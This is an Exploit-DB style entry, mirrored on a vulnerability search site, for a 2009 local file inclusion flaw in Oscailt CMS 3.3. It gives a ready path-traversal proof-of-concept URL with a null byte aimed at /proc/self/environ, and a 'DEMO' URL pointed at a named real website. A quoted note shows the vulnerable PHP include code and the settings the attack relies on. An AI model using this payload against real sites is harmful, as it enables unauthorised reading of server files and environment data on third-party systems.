Lucene search
S4r4d0EDB-ID:9922HistoryOct 28, 2009 - 12:00 a.m.
Oscailt CMS 3.3 - Local File Inclusion
2009-10-2800:00:00
s4r4d0
www.exploit-db.com
27
AI Score
7.4
Confidence
Low
[0] Oscailt 3.3 CMS
[0] Download: http://sourceforge.net/projects/oscailt/
[0] Bug: Local File Inclusion in index.php file !
[0] Author: [email protected]
[0] Team: Fatal Error
[0] Poc: http://www.site.com/index.php?obj_id=/../../../../../../../../../../proc/self/environ%00
[0] DEMO:http://imemc.org/index.php?obj_id=/../../../../../../../../../../proc/self/environ%00
[0] Greetz: Elemento_pcx - z4i0n - m4v3rick - HADES - Hualdo - Derf - DD3str0y3r - Obz !!!
[0] Made in Brazil - SP
[0] Source Code:
# SecurityReason Note :
#
# The option "Use Friendly URL's" in configuration must be set off
#
# Vulnerable Code in index.php :
#
# $target_indyobject_id = getRequestTargetObjectID();
# ...
# if(!$use_live)
# {
# $cachefile = getObjectCacheIndexFile($target_indyobject_id);
# if(file_exists($cachefile))
# {
# include_once($cachefile);
# }
#
# in function getObjectCacheIndexFile() we have ...
#
# function getObjectCacheIndexFile($id)
# {
# $dir = getObjectCacheDir($id);
# $f = $id.'.inc';
# return $dir.$f;
# }
#
# As we can see , $cachefile try include inc file in cache dir.
#
# magic_quotes = Off // to use %00 null byte
#
# - sp3x
#
[0]Reference: http://securityreason.com/exploitalert/7422
Related
prion
prion
Directory traversal
2009-12-31 19:30:00
cve
cve
CVE-2009-4512
2009-12-31 19:30:00
cvelist
cvelist
CVE-2009-4512
2009-12-31 19:00:00
nvd
nvd
CVE-2009-4512
2009-12-31 19:30:00